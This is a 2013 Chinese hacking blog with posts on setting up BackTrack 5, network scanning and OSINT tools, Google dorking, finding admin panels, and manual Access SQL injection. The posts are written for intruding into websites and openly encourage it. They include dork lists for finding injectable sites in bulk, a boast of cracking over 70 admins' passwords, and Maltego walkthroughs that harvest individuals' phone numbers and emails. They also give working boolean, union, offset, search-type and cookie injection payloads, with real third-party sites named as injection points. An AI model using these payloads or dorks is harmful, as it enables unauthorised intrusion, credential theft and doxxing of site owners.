2013年2月16日星期六

backtrack5 安装与汉化

                      
 1.默认next安装之后
   startx进入图形界面
   默认root密码toor

 2.安装vm tools
    tar -zxvf  *.tar.gz   解压
    解压成功之后转到解压出来的vmware-tools-distrib 目录
    运行安装程序 vmware-install.pl
    终端命令为 vmware-install.pl 安装完成之后重启

 3.安装中文输入法
       apt-get install language-pack-zh language-support-zh
       默认安装ibus 
       然后 系统->首选项->IBUS首选项切换到 输入法选项卡,点添加左边的下拉列表框选择 汉语->拼 PINYIN
       后点 添加 按钮
       设置-系统设置-开机和关机-自动启动,到了这里面 有个添加程序按纽,点开后单击浏览按纽
       找到ibus安装路径 ,默认情况下在/user/bin/ibus-daemon 选择ibus-daemo


 4.系统汉化
   找到系统盘--etc--apt--sources.list
   把下面链接覆盖到里面
# deb cdrom:[Ubuntu 10.04.1 LTS _Lucid Lynx_ - Release i386 (20100816.1)]/ lucid main restricted
# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
# newer versions of the distribution.

deb http://mirror.bjtu.edu.cn/ubuntu/ lucid main restricted
deb-src http://mirror.bjtu.edu.cn/ubuntu/ lucid main restricted

## Major bug fix updates produced after the final release of the
## distribution.
deb http://mirror.bjtu.edu.cn/ubuntu/ lucid-updates main restricted
deb-src http://mirror.bjtu.edu.cn/ubuntu/ lucid-updates main restricted

## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu
## team. Also, please note that software in universe WILL NOT receive any
## review or updates from the Ubuntu security team.
deb http://mirror.bjtu.edu.cn/ubuntu/ lucid universe
deb-src http://mirror.bjtu.edu.cn/ubuntu/ lucid universe
deb http://mirror.bjtu.edu.cn/ubuntu/ lucid-updates universe
deb-src http://mirror.bjtu.edu.cn/ubuntu/ lucid-updates universe

## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu
## team, and may not be under a free licence. Please satisfy yourself as to
## your rights to use the software. Also, please note that software in
## multiverse WILL NOT receive any review or updates from the Ubuntu
## security team.
deb http://mirror.bjtu.edu.cn/ubuntu/ lucid multiverse
deb-src http://mirror.bjtu.edu.cn/ubuntu/ lucid multiverse
deb http://mirror.bjtu.edu.cn/ubuntu/ lucid-updates multiverse
deb-src http://mirror.bjtu.edu.cn/ubuntu/ lucid-updates multiverse

## Uncomment the following two lines to add software from the 'backports'
## repository.
## N.B. software from this repository may not have been tested as
## extensively as that contained in the main release, although it includes
## newer versions of some applications which may provide useful features.
## Also, please note that software in backports WILL NOT receive any review
## or updates from the Ubuntu security team.
# deb http://mirror.bjtu.edu.cn/ubuntu/ lucid-backports main restricted universe multiverse
# deb-src http://mirror.bjtu.edu.cn/ubuntu/ lucid-backports main restricted universe multiverse

## Uncomment the following two lines to add software from Canonical's
## 'partner' repository.
## This software is not part of Ubuntu, but is offered by Canonical and the
## respective vendors as a service to Ubuntu users.
# deb http://archive.canonical.com/ubuntu lucid partner
# deb-src http://archive.canonical.com/ubuntu lucid partner

deb http://security.ubuntu.com.sixxs.org/ubuntu lucid-security main restricted
deb-src http://security.ubuntu.com.sixxs.org/ubuntu lucid-security main restricted
deb http://security.ubuntu.com.sixxs.org/ubuntu lucid-security universe
deb-src http://security.ubuntu.com.sixxs.org/ubuntu lucid-security universe
deb http://security.ubuntu.com.sixxs.org/ubuntu lucid-security multiverse
deb-src http://security.ubuntu.com.sixxs.org/ubuntu lucid-security multiverse
deb http://mirror.bjtu.edu.cn/ubuntu/ lucid-proposed restricted main multiverse universe

然后升级
apt-get update
安装
apt-get install language-selector
安装完成后在system--adminstrators--language support--install/remove language --chinese
等待下载完成后
text里  选择汉语
apply system-wide
ok重启 
  

5.安装chrome
 下载deb文件
 安装 sudo dpkg -i   xxx.deb
 卸载 sudo dpkg -r   xxx.deb
 安装完成
 无法以root用户运行
 修改chrome的属性
 /opt/google/chrome/google-chrome --user-data-dir




Read more »

2013年2月14日星期四

backtrack之扫描工具

                        

一.主机发现
1.asping
  局域网内由于防护墙原因一个ip ping不通很正常,但arp解析不了就不正常了
  所以就算不返回ICMP ECHO 也得回ARP ECHO
  命令:arping -c 3 192.168.1.103
   -c 3 操作3次
2.fping
  说白了就是快速ping,也是使用ICMP ECHO,一次请求多台主机
 命令:fping -s -r 1 -g 10.1.1.1 10.1.1.255
 -s  输出最终的结果
 -r  尝试次数
 -g  扫描范围

3.genlist
  和fping差不多只是输出结果更简洁
命令: genlist -s 10.1.1.\*

4.hping3
 这玩意功能很强大,可以自定义数据包,但是不会用
 eg:hping3 -c 3 10.1.1.100
 hping3回车后可以自定义数据包
 eg:
 发包 hping send {ip(daddr=10.1.1.100)+icmp(type=8,code=0)}
 收包 hping recv eth0
 操作很难
5.nbtscan
 扫描一个ip地址范围的NetBIOS名字信息,它将提供一个关于IP地址NetBIOS计算机名字
 服务可用性,登录用户名和MAC地址的报告
 这个命令扫描微软主机很好用的,速度很快
 命令:nbtscan 10.1.1.1-254
6.nping
  nping比hping3操作要简单的多了,也可以简单的自定义发包
  nping工具容许用户产生各种网络数据包(TCP,UDP,ICMP,ARP)
  也允许用户自定义协议头部,例如 源和目的,TCP和UDP的端口号。
命令
eg:nping -c 1 --tcp -p 80 --flags syn 10.1.1.1
    发了一个syn的包,会RCVD收到一个SA(syn ack)的包
    nping -c 1 --tcp -p 80 --flags ack 10.1.1.1
    如果tcp端口没有开的话,我发ack的包,肯定会被服务器拒绝的,
    因为没有达成tcp协议
    nping -c 1 --udp -p 80 10.1.1.1(udp可没有flag)
    如果udp端口没有开的话,,就端口不可达了会回一个ICMP的包
7.onesixtyone
  onesixtyone是一个snmp(simple network monitoring protocol)扫描工具,用于找出设备上的SNMP      
  Community字串
  扫描速度非常快
  路径:/pentest/enumeration/snmp/onesixtyone
  nano dict.txt  可以添加字典文件的
  命令: ./onesixtyone -c dict.txt 10.1.1.1
  r如果字典文件给力的话。。就ok,能爆出密码的

8.protos
 protos这个软件主要用于扫描特定主机上所支持的协议,对扫路由器来说很好用的
 路径:/pentest/enumeration/irpas
 ,命令:./protos -i eth0 -d 10.1.1.2 -v
  -i  是接口
  -d  路由器地址
  -v  详细显示


二.操作系统指纹
  1.p0f
    一个被动的操作系统指纹监控工具,Cisco IPS就是利用这个程序获取被攻击目标的操作系统
   路径:pentest/enumeration/irpos
    p0f 直接回车监听,效果不怎么好
  2.Xprobe2
    主动OS指纹探测工具,主动发送各种包来探测目标是什么系统
   命令: Xprobe2 10.1.1.1

三.端口扫描
 1.AutoScan(图形化)
  路径:Network Analysis/Network Scanners
  功能不怎么强大
 2.netifera
  不仅可以扫描开放端口,还可抓包
  局域网内扫描,抓包,密码之类的都能抓到
 3.NMAP
   NMAP是一个综合性的,并且特性丰富的扫描工具。是渗透测试者的必备工具,功能很强大
   包含如下功能:
  -Host discovery     (主机发现)
  -Service/version detection (服务版本检测)
  -Operating system detection(操作系统检测)
  -Network traceroute  (网络追踪)
  -Nmap Scripting Engine (NMAP脚本引擎)
  命令:
   nmap -v -n -sP 10.1.1.0/24
   nmap -v -n -A  10.1.1.1
   -v 显示扫描结果
   -n 不做DNS解析,很慢的
   -sP 通过ICMP ECHO 进行扫描
   -A  扫描所有能扫描的信息

四.服务探测
 1.Httprint
  用于检测HTTP服务器的软件和版本
  路径:/pentest/enuneration/www/httprint/linux
  命令:./httprint -h 10.1.1.1 -s signatures.txt
 2.Httsquash
  和Httprint功能一样
  路径:/pentest/scanners/httsquash
  命令:./httpsquash -r 10.1.1.2

五.VPN扫描
1.ike-scan
 是一个IKE扫描工具,主要用于探测IPSec VPN服务器支持策
 命令: ike-scan -M -v 10.1.1.2
2.sslscan
 命令:sslcan 10.1.1.2
Read more »

2013年2月13日星期三

backtrack之信息收集

                               

一DNS信息收集工具
  1.Dnsenum

    -使用google搜索引擎获取额外的名字或子域名
    -使用txt文件暴力破解子域名
    -使用whois查询c段网络范围,并且计算网络范围
    -反向查询
    -支持多重查询

    Dnsenum路径:
      cd /pentest/enumeration/dns/dnsenum
    命令

   eg: ./dnsenum.pl -f dns.txt --dnsserver ns1.cisco.com  cisco.com(域名)-0 1.txt

    ./dnsenum.pl cisco.com   简单的访问查询
    -f dns.txt               调用字典
    --dnsserver ns1.cisco.com
                8.8.8.8       询问官方的dns服务器
    -o  1.txt                 输出保存查询结果

   Trying Zone Transfers and getting Bind Versions:  进行区域传送肯定会失败的
   区域传送:主dns和被dns要同步dns数据库,就会做区域传送  所以一般非信任的dns服务 器肯定不容许你和它来这个的
   dns的两个协议:
     tcp53  只是在两个dns进行区域传送的时候才会用到
     udp53  防火墙防的是udp的而不是tcp的,正常咱们询问的都是udp的
  

 2.Dnsmap
   Dnsmap非常类似于Dnseunm,可以使用内建的wordlsit来暴力破解子域,也可以自建字典
   支持把结果输出为CSV格式,csv可以excel打开 并且运行时不需要root权限
   Dnsmap路径:
    cd /pentest/enumeration/dns/dnsmap
   命令:
  eg: ./dnsmap cisco.com -w wordlist_TLAs.txt -c cisco.csv
  -w wordlist_TLAs.txt  指定暴力破解文件
  -c cisco.csv 输出文件
   cisco.com为目标域
二.路由信息收集
    1.tcptraceroute

    最传统的路由信息收集方法
    命令:traceroute  www.cisco.com
    没有成功,因为传统的方式穿越防火墙的效果不怎么好
    传统的traceroute技术发送UDP或者ICMP ECHO,但tcptracerroute发送TCP SYN包到目标
    命令: tcptraceroute www.cisco.com
    会看到能跳到open的端口
    好处: 就算目标之前存在防火墙,他阻止了tracerroute的流量,但是适当tcp端口的流量防火墙是放行的,所以tcp能穿越防火墙抵达目的地
    tcptracerroute收到SYN/ACK表示端口是开放的,收到RST表示端口是关闭的
    2.tctrace    
     tctrace工具非常类似于tcptraceroute,他不使用ICMP ECHO 而是使用TCP SYN包
     路径:
     cd pentest/enumeration/irpas/
     eg:  ./tctrace -i eth0(网卡) -d www.cisco.com
     效果和tcptraceroute一样的
   
三. All-in-one 智能收集工具 
   1. Maltego(图形化界面)

     Maltego是一个开放源的智能信息收集工具
     收集的东西很多
    网站信息
    -Domain names (域名)
    -DNS name    (DNS名)
    -Whois infomation (whois信息)
    -Network blocks (网段)
    -IP addresses     (ip地址)
    个人信息
    -公司或组织关联到的人
    -电邮地址关联到的人
    -网站关联到的人
    -市区网络关联到的人
    -电话号码关联到的人
   路径:
   dns analysis/maltego
   使用方法:我就直接贴网上现有的把
  link:http://wifibeta.com/2012-03/thread-675-1-1.html
    
   我们来熟悉一下界面,侧栏是可以添加的切入点,选择已有的数据拖动添加到主窗体即可

image
可以看到这个软件还是偏向于收集网络化数据,切入点之多,功能之强大,令人惊叹。
以笔者邮箱为例,添加一个实例,从transform server获取所有可能的数据:

image
  
期间可能会要求确认相关协议或者信息,点击Accept即可。
可以看到,出现了相关联的数据:
image
经过判断初定wifibeta.com可能有其他有用的数据,可以以wifibeta.com为节点,继续从服务器获取信息:

image
数据像滚雪球一样越滚越大,不仅出现了站长留在Whois信息中的手机号(虽然此处是虚假的,但是有相当大部分站长的Whois数据都是真实有效的),还显示出郑州使用的CDN,域名注册商,组织名称等等。
通过一层层深入,我们获取到了电话的可用信息:
image
随后从网站上有更多可利用信息被获取:
image
拓扑看起来已经相当强大,这只是由一个Email可以获取到的信息!
image
如果我们只是有某人的名字,那么可以获取到什么信息呢?我们拿大名鼎鼎的乔布斯和比尔盖茨试试:
image
第一次展开,我们获取到了16个Facebook用户数据,2个电话号码,10个Email地址:
image
笔者以Email为线索,抓住@apple.com和@microsoft.com邮件层层深入,获取到了更多有效的信息:
image
至此拓扑非常强大,若有兴趣可以自行测试。
此外,拓扑还支持总线型,星形等拓扑,非常直观。

image
 window版maltego最新版本
link:http://pan.baidu.com/share/link?shareid=281153&uk=1261197508
下载后第一次使用会提示注册的
Read more »

2013年2月12日星期二

googlehack信息收集

                            googlehack信息收集

      google站点:
     https://www.google.com.hk/
     http://www.google.com.hk/webhp?hl=xx-hacker        黑客
     http://www.google.com/custom?hl=zh-CN              中文
     http://www.google.com/custom?hl=en                 英文

一. google搜索引擎就是强大啊,记得之前爱用google是因为google的goagent翻墙代理,
  还有他强大的chrome浏览器。虽然chrome老是不稳定,但用习惯了他的书签管理和在线翻译,就再也放不下chrome了,但由于chrome的hack插件是无法与firefox比拟的,相对来说各有优点,只有chrome,ie,firefox三剑走天涯了。但google的强大远远不仅仅在此,google是一个强大的搜索引擎,而对于黑客而言,则可能是一款绝佳的黑客工具。
    下面先介绍一下google常用的几个搜索语法:

        site:    找到与目标站点有关的url      site:baidu.com
      
        inurl:   搜索关带有键字的url          inurl:Article_Class2.asp?

        intext:   网页正文内的关键字           intext: to parent directory

        intitle:  网页标题中的字符            intitle:  后台

        filetype: 搜索指定类型的文件          filetype:.cbi  .mdb  .asp

        info :    网站基本信息                 info:baidu.com

        link:    与站点链接的站               link:baidu.com

     其实掌握着七个也就足够了,只要我们灵活的运用组合,还是能搜到自己想要的信息的。
    个性化的组合,会使googel威力加倍。

二. 下面我们就来说说google的实际运用吧

    1.批量寻找注入点
     对于刚接触网络安全的朋友们可以利用  google语法  加  啊D ,就可以满足一下自己渴望入侵的心灵啦!说起这个。我就想起来我第一次搜索注入点时候就用了一个  inurl:Article_Class2.asp?  猜解到了70多个网站管理员的登录密码,当时差点让俺高兴死。

    2.信息收集
      举个例子吧,假如你想入侵一个网站202.201.112.98,首先

       info: 202.201.112.98                                         基本信息

       link:202.201.112.98                                         链接站

       site:202.201.112.98 //                                      二级域名

       site:202.201.112.98  filetype:mdb  doc                     下载数据库

       site:202.201.112.98  inurl:asp?  filetype:asp php jsp      寻找注入点

       site:202.201.112.98  intext:ftp://*:*                        ftp地址

       site:202.201.112.98  intext:管理|后台|验证码                 寻找后台
 
       site:202.201.112.98  inurl:robots.txt  intext:User_agent    查找网站路径

       site:202.201.112.98  inurl:upload.asp   load   file         寻找上传漏洞

       site:202.201.112.98  intext:*@xxxx.com //   intext:电话//    邮箱电话
     
      看到网站下面的联系方式   google   姓名  手机号  邮箱   qq号    寻找网管信息

    3.谷歌其他语法
       allinurl 会比 inurl更精确
       '能够搜到不拆开的关键字   如   伤心的鱼'
       + 把google可能忽略的字列出来
       - 把某个字忽略
      ~ 同意词
      . 单一的通配符
      * 通配符,可代表多个字母
      "" 精确查询
     

    4.个人感觉几个好用的关键字2013-1-25

            杭州 inurl:Article_Class2.asp?
  
            北京     inurl:edit.asp?

               NewsInfo.asp?id=

              info.asp?id=

             news_show.asp?id=

           CompHonorBig.asp?id=


           showproduct.asp?id=
      
          inurl:website.php?id=

          inurl:articleshow.asp?articleid=45   id随便改

         allinurl: DownloadShow.asp?DownID=    后台boss  良精0day




Read more »

寻找后台思路整理

                          

1.搜索引擎查询
    命令很多种列几种自己常用的吧:
    site:heimian.com   intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|manage|admin|login|system

    site:heimian.com   inurl:login|admin|manage|manager|admin_login|login_admin|system

    site:heimian.com   intitle:管理|后台|登陆|

    site:heimian.com   intext:验证码

/admin/manage
/manage


==================================


2.工具 
   啊d   明小子
   intellitamper   菜刀   jsky 

================================================


3.查看图片文件的属性   看路径  看管理目录


=============================================


4. 查看网站使用的管理系统

=============================================

5.查看同ip上其他站的管理目录 
  曾经遇到过s
  192.168.1.1:8000/Admin_Login.asp
====================================

6.robots.txt都在根目录下的
 www.jynp.cn/robots.txt
 site:www.jynp.cn inurl:robots.txt
                  intext:User_agent
=============================================
Read more »

access手工注入基础整理

                              

一.判断注入
    数字型查询  and 1=1 and 1=2
    字符型查询  'and '1'='1  'and'1'='2


二.数据库类型的判断
    1.普通报错
      JET引擎连接数据库      access
      ODBC引擎连接数据库     mssql
    2.手工猜解
          ;--
       mssql数据库里   ;为语句间分隔符 --为解释符           
       所以mssql返回正确,access返回错误
    3.access和mssql差异查询
       and exists (select * from sysobjects)      mssql返回无法读取
       and exists (select * from mysysobjects)    access返回无权限

三.access数据库手工注入(通用)
    1.猜表
        and exists (select * from 表名)      
  
    2.猜列
        and (select 列名 from 表名)
    
    3.猜列个数
       and (select 列名 from 表名)=X                                 管理员个数

    3.猜列长度
        and (select top 1 len(列名) from 表名)=X  一般密码都md5加密16 32 40     位 用户名一般5位admin
    4.猜字段内容
        and (select top 1 asc(mid(列名,x,1)) from 表名)=xx  中文asc负数abs()函数

四.access数据库联合查询注入
    1.猜列个数
        排序法     order by X    
        覆盖法    and 1=2 union select 1,2,3,....x from 表名
    2.猜字段内容
       and 1=2 union select 1,2,3,4,..x from 表名

五. access偏移注入
   1.从后往前偏移
  -x       第一次  *前移自减直到显示出数据   x即admin中的列
  -x-x     第二次  from (admin as a inner join admin as b on a.id=b.id)  无数据 再 在*前添加 *-1或a.id,b.id,  为了打得更乱
  -x-x-x   第三次  from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id =b.id)  无数据再添c.id
  -x-x-x-x 第四次  from(((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id =b.id) inner join admin as                  
                   d on a.id=d.id)  无数据再添d.id
 
   2.从前往后偏移
 and 1=2 union select *from( from (admin as a inner join admin as b on a.id=b.id )

 and 1=2 union select * from ((select * from admin) as a inner join (select * from admin) as b on a.id=b.id) inner join (select * from admin) as c on c.id=a.id

六.搜索型注入
   1.判断存在
     %' and 1=1 and '%'='
     %' and 1=2 and '%'='
     a%' and 1=1-- 正常
     a%' and 1=2-- 错误

   2.get搜索型手工注入
       猜表列
            1%'and(select count(列名)from 表名)>0 and '%'='
       猜列名长度
            1%'and(select top 1 len(列名)from 表名) and '%'='
       猜字段
            1%'and(select top 1 asc(mid(列名,N,1))from 表名)>X and '%'='

   3.get搜索型工具注入
       注入点
          http://www.sctone.com.cn/sctone/News_search.asp?key=1&otype=title&  amp;Submit=Search
       两种修改注入点关键字放最后 
          http://www.sctone.com.cn/sctone/News_search.asp?otype=title&Submit=Search&key=1
          http://www.sctone.com.cn/sctone/News_search.asp?key=1
       放进工具跑
       nbsi  hdsi  穿山甲
   4.post搜索型工具注入
       wsockexpert抓包 把关键字放到url的后面
           http://www.cnaec.com.cn/Work/refer/Search/2.asp
           http://www.cnaec.com.cn/Work/refer/Search/2.asp?KeyWord=1
       放到工具跑
       nbsi  hdsi   pangolin
七.cookies注入
   1.cookies的注入语句:
      javascript:alert(document.cookie="id="+escape("ID值 and 注入攻击代码"));
   2.cookies工具注入
      利用cookies注入中转工具修改url
      本地搭建服务器
  
Read more »
Blogger 提供支持.

This is me

© Manuel